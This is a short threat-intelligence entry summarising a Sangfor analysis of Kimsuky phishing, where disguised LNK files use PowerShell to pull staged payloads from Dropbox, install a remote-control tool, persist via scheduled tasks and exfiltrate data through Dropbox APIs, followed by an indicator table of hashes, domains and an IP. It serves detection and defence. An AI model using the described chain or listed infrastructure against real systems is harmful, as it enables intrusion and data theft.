Kimsuky组织利用Dropbox云端实施行动分析
2024-01-30 • Sangfor • Kimsuky organization leverages Dropbox cloud for operational analytics •
Sangfor links this Kimsuky activity to malicious LNK files disguised as Korean PDF or HWP documents for targets in cryptocurrency, government, diplomacy, media, and North Korea policy circles. One lure posed as a Korean cryptocurrency trading lecture and used PowerShell to pull ps.bin from Dropbox, which then loaded r_enc.bin and a TutClient remote-control component. The chain wrote a VBS stage under the Windows Templates directory, fetched a decoy PDF from hyojadong.kr, created scheduled tasks, and downloaded later PowerShell payloads. The operation used Dropbox for both staging and exfiltration, including scripts that collected host and file information and uploaded the results through Dropbox APIs.
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| HASH | 0040f03faf5bbdc555f2039a4e33a82b | 2024-01-30 | 2024-06-12 |
| HASH | 3e3013fe03f7416b8d1e96591f8e5839 | 2024-01-30 | 2024-04-17 |
| HASH | fcdcc6c56ae43f7a78413cc5204e9314 | 2024-01-30 | 2024-04-17 |
| HASH | 32519b46b55792084240f850e0c94298 | 2024-01-30 | 2024-04-17 |
| DOMAIN | gbionet.com | 2024-01-30 | 2024-04-17 |
| IPv4 | 122.155.191.33 | 2024-01-30 | 2024-04-17 |
| HASH | dce864eabfbd6445682a4671a2fee1a9 | 2023-12-29 | 2024-04-17 |
| HASH | befa4094eb7ceb31be76ec98b11353b… | 2024-01-30 | 2024-03-28 |
| URL | https://hyojadong.kr/js/slick/d… | 2024-01-30 | 2024-03-28 |
| DOMAIN | hyojadong.kr | 2024-01-30 | 2024-03-28 |
| HASH | 617a4a83e7fb10a4a9ef993cdfe4d83… | 2024-01-30 | 2024-01-30 |
| URL | http://gbionet.com/ | 2024-01-30 | 2024-01-30 |
| HASH | 9fa12b629ca431ebc3aa56da2d7a784a | 2023-09-26 | 2024-01-30 |